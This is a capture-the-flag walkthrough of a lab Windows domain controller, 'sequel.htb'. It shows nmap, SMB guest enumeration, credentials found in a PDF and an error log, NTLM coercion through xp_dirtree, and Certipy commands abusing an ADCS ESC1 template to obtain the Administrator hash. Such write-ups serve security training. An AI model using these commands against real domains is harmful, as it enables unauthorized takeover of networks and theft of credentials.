Medium Windows Active Directory machine on sequel.htb. Anonymous SMB access
exposes a PDF containing SQL credentials. From MSSQL, xp_dirtree coerces an
outbound NTLM authentication captured by Responder — cracking the hash gives WinRM access
as sql_svc. The SQL error log contains a password typed into the username field,
pivoting to Ryan.Cooper. An ADCS ESC1 misconfiguration allows requesting a
certificate for Administrator, yielding the NT hash via Certipy and faketime
for the +8h clock skew.
User Flag
b25d949f62xxxxxxxxxxxxxxxxxxxxxx
Root Flag
4523a45b65xxxxxxxxxxxxxxxxxxxxxx
01Reconnaissance
Full port scan reveals a Domain Controller profile with an exposed MSSQL instance. Note the ~8h clock skew — this will matter during Kerberos authentication later.
nmap
$nmap-sC -sV -p- --min-rate 5000 -oNnmap_full.txt10.129.xx.xx53/tcp open domain Simple DNS Plus88/tcp open kerberos-sec389/tcp open ldap Domain: sequel.htb445/tcp open microsoft-ds Windows Server 20191433/tcp open ms-sql-s SQL Server 2019 RTM5985/tcp open wsman WinRM|_clock-skew: mean: 7h59m58s
clock skew +8h: Kerberos requires clocks within 5 minutes of the DC. Certipy's auth step will fail without compensating — use faketime -f "+8h" per-command.
/etc/hosts
$ echo "10.129.xx.xx sequel.htb dc.sequel.htb" | sudo tee -a /etc/hosts
Test SMB — null session is denied but the guest account works and reveals a non-default Public share:
SMB guest access
$nxc smb10.129.xx.xx-uguest-p''--sharesPublic READIPC$ READ$smbclient//10.129.xx.xx/Public-U guestsmb:\>get"SQL Server Procedures.pdf"
The PDF is an internal onboarding document. A section at the bottom provides SQL Server access for users whose accounts haven't been created yet:
SQL Server Procedures.pdf
User: PublicUserPassword: GuestUserCantWrite1
credentials:PublicUser:GuestUserCantWrite1 for MSSQL. The document also mentions users Tom, Ryan, and Brandon — worth noting.
02Foothold — xp_dirtree NTLM Coercion
Connect to MSSQL and assess privilege level. xp_cmdshell is locked, but xp_dirtree is available — it accepts UNC paths, forcing an outbound NTLM authentication we can capture with Responder.
From the sql_svc shell, browse the filesystem. C:\Users shows a Ryan.Cooper profile — inaccessible for now. But SQL Server error logs are readable and contain something unexpected:
SQL error log — password typed as username
*EWR*typeC:\SQLServer\Logs\ERRORLOG.BAKLogon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match...Logon failed for user 'NuclearMosquito3'. Reason: Password did not match...
finding: someone typed their password (NuclearMosquito3) into the username field during SQL Server setup. The error log captured it in plaintext. Credentials: ryan.cooper:NuclearMosquito3.
While on sql_svc, whoami /groups showed membership in
BUILTIN\Certificate Service DCOM Access — a hint that ADCS is installed and worth
enumerating. Run Certipy as Ryan.Cooper to find vulnerable templates:
ESC1: The template lets any Domain User specify an arbitrary Subject Alternative Name (SAN) while also allowing Client Authentication. This means any domain user can request a certificate that impersonates any account — including Administrator.
Request a certificate with the Administrator's UPN in the SAN:
Certipy — request cert for Administrator
$certipy-ad req \
-uryan.cooper@sequel.htb-p'NuclearMosquito3' \
-casequel-DC-CA \
-templateUserAuthentication \
-upnadministrator@sequel.htb \
-dc-ip10.129.xx.xx[*] Got certificate with UPN 'administrator@sequel.htb'[*] Saved as 'administrator.pfx'
Authenticate with the certificate to get the NT hash. The +8h clock skew causes KRB_AP_ERR_SKEW — wrap the command in faketime:
Certipy auth (faketime +8h)
# without faketime — fails$certipy-ad auth-pfxadministrator.pfx-domainsequel.htb-dc-ip10.129.xx.xx[-] KRB_AP_ERR_SKEW(Clock skew too great)# with faketime — succeeds$faketime-f"+8h" certipy-ad auth -pfxadministrator.pfx \
-domainsequel.htb-usernameadministrator-dc-ip10.129.xx.xx[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee